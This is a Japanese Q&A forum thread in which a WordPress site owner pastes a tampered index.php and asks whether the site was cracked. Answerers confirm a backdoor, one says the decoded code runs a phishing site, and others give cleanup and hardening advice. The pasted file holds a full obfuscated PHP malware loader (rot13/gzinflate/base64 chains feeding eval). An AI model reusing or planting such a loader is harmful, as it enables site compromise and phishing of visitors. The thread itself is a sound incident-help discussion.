Q&A
まずやることはサイトの閉鎖では。
evalとかかなりマズいですよ。
初めての投稿です。amazonのlighsailでwordpressのサイトを構築したのですが、昨日突然500エラーでアクセスできなくなりました。管理画面にもサイトにもアクセスできずに以前取得したスナップショットから作り直したのですが、復旧後、数時間して再びアクセスできなくなりました。色々調べていて、以下のファイルが書き換わっているように感じるのですが、これはもしかしてクラッキングされていますでしょうか。。。もしかしたらバックドアも設置されているのかもと思いとても不安です。
すみませんが、クラッキングされているかどうかと今後の対策を教えていただきたいです。
改竄の可能性があるファイル:
/opt/bitnami/apps/wordpress/htdocs/index.php
ファイルの中身
<?php include('block.php'); $i1i='======================================================================== Obfuscation provided by Unknowndevice64 - Free Online PHP Obfuscator =============================================================================='; $uD64_c0m="\163\164\x72\x5f\162\x6f\164"."13";$uD64_Com="\147\x7a\151\x6e\x66\x6c\141\164\x65";$uD64_C0m="\142\x61\x73\145 64\x5f\x64\x65\143o\144\145";$x0zRy=$uD64_Com($uD64_C0m($uD64_c0m("QMUYqcfjNRD/lOfcO9qz0DHigMXDOUdOiLiOZDXy0WtTj9rKU5t7q0o eNEY1KBfRCxtl3+EzF6AzmVLzjXbp6aG0+rO57bMB9GXdmKuvd7+cCtdWo0YpD6E1rZ9gRVcgHzH0pDznbjHuX9oKwnDiMAGeLyqj0i6kIPx0y+EXkTN6CGEav lOG6sIncnDHPsQRj1WLpBO9+27J7VfCfxxT8X2F7f5KggWx+rXcrEZcCuzCPcSZA6zm7lXYSKKao9b/yubSNq0mGLdCiYrgtqAiaoP/gD+kGAyJtNiIAaQyuw6 bWqDPxtxHb9VSz3RxI76m2V7/kULOqFYidwrugINmBC7yNY4o0klfQ7jSM0Og05TZ1+Vk8q1snhsoLhZI7+Z7TocJj2mYjDtckNArjpVFv/IdsgEjBMEIeCYgs WVBiXe1CPx0l9mBZIakWRQ0hKhiAPBH6WzJr3+d0VC3ESRDvfbqWKAf4rokYXOUArbdchM9DktoU0LLbVrj87gjPWpTwAWBuBzSngAqBGbXf4V37cgEbyNJ6NV dAKtPzxPyeIDDs9YgQP4VkezkB7h9J4qd5nnoDR9V7COMoKvbGSgJh3scb5xcttvHUmHVAd6LZ703AIw+5Pw44hi0VHTo52zpXNIN4oWDnEzKloUns2Bds/Mff RYe6TE7sR5pklgtQvd1A/bJ+scKEP/E+CZ/")));@eval($uD64_c0m('$k0xEm="MIKoogf4RC2IbhuQv7kDwh0xXNdfYMTcYdESpbnBQY8Hmd5fHdaGyIgqi a7Uqv8C+2NL5CNZm5xmUY0oJYGcC70ST75dfJPT8n4L09plzsdIFT/GjJPEBYBBVlvth0aUiIBQaQd/b7v+mqwFesNFGlE0eElKSU9rhCcISpWcgTjfemtxKUN kT3YEiuWBX/68yCM+lX/kc0g86NHXscVQ3cpUBGBj85aDW+ARSDq2Ztq2KlFlD9tE390cp0gGJZa0LJnyd9iZAcKvPeJ/4ScUhNXeJEy3bkYIJp+6jNfie6QYN nn+iBcpS/nft01JSk37dj6dQ7e6cRq+hqqq7d0bY90Y8hSnW32gR6GUqsrdpiiZZGTseMH/5PRjMqKPWr6mpsYx6A7ltR3hwpippMVkoNchAzfVGD58oud+y2T wcB0nnoSGQo6F7eavbISB7yCYNz0mj3TDfBgKxRoFuwgQqInjnjes+gGgEuK6QrRsZduhQpv5jsOQ2L2PWV1XglCqKIuQBapviPu8mcEspdEmTEWsZT6qBSst7 fRW7dJKr+K5cUFYFR+JGwXmV33pRI8IVv2QwvmcYzA8fRCap8N2N7rEQHM26ASMoOKU76gD9poeS4Ow5PQ6bbXrFKQPPVkVq1/T+aGTy7QbZmOCcWhcjCd8jK5 AsWJqZwsjHE00+qNVFK2vVUlGbTeaf0sR9g4VmzDjFfXZT1rCWb6dSrW+sMv+TXumfA2xRWdcWZlcCcUlwaGKq9aVwjeVA9PZ6wOD3p/phO2mEkQ1DSbw0v1xj e2lZaXADQznQFkV9jSs8kTQj3oZzXyXjAana57Vj7yx6OKKHD4aDK53cUILrLCeERLeVC9gzXjTg1F2vmYUOjKAJsr9fgtbkVppcbk8w/DtPfWyqfGoNxXUV+4 IIN+LHTHkmUQxH4a6IL36kHX4ZooKuGrvTA3wRjolT4ZHLMnEa4JiMfJMN9O9moWnZsVW5ZGn7bMpGrIV/OZqRSzaNi9KPExIKw0P8UfQYOGkEvy631Xb5EeBs qX2FbFbCWwa3YqAEwtKry16b6wBY9GKmNKrlbM8FacUp2nvJCurObkVkjGqLaFPAnE7Vtq2FmvBb3Tycs4vidKLYTIPojMbCbUEEHm8LY+2HRKHe0qSeLnHA7s IDknmgiEd6Ho5yq7WJKrGtz4ILSrT3Fxs0jzv7dv2K2Iv1NbJxlsOwcc132EpEp7KR+G17/zxoR0qfitme6wR+FUg13UK5X5zBvj5mnz99ABzhhQZ+IlJQfsOp BcASgHe2Z00gNsA9H068VS0Zk3sQ9KCArxzi0kXp2AkzEhDsxf9mn0LK9qr/8DWJjMIJ3iW+93SDcELAENsQm/a3urSJs1x6/Z6Yj9asfrW/Z1iWhjsKqadS46 SbsDMi+DIoI4gwc/rsama2oNWa95hb+aggc//f41z821/A6s1wC4a22t+3sLm2c+s1/Fw9FH2i6Jmq7/JyBajBkBucuTqCzrporsm7n8p0+yy53/Li/7+8nI58 /7Ayp37n6e37l5seN8sCam8Qj==";@riny(tmvasyngr(onfr64_qrpbqr($k0xEm)));'));
回答3件
0
難読化されたコードの解析はしていませんが、侵入・改竄されてバックドアが仕掛けられていることは間違いないと思います。
さしあたり、サイトを閉じることはやるとして、その後の対応は状況により変わるので、しかるべき専門家に依頼するべきだと思います。
投稿2021/05/02 10:00
総合スコア11701
0
開設してちょっと経つと海外から怒涛のアタックがくるので、セキュリティ対策してないwordpressはよく改竄されてますね。
僕も知らずに幾つかのサイトに、広告が表示されるやつを仕込まれました。
miniOrange 2-Factorを入れて、ログイン時にトークン入力必須にしたり、
wpセキュリティを入れて穴を潰すようにするといいと思います。
既存のファイル群は、どこが改竄されているか、どのファイルが追加されているかをチェックするのは厳しいので、
諦めて削除してゼロから作り直した方が無難です。
投稿2021/05/13 05:29
総合スコア599
0
ベストアンサー
回答ではないです
ヒントがたくさんあったので、解析してみました。
index.php 以外にもいろいろファイルが置かれていると思います。
正常に動いていると、フィッシングサイトとして機能するようですね。
アクセスの log も取ろうとしていたようです。
「500エラー」で良かったです。
投稿2021/05/06 11:28
退会済みユーザー
総合スコア0
あなたの回答
tips
プレビュー
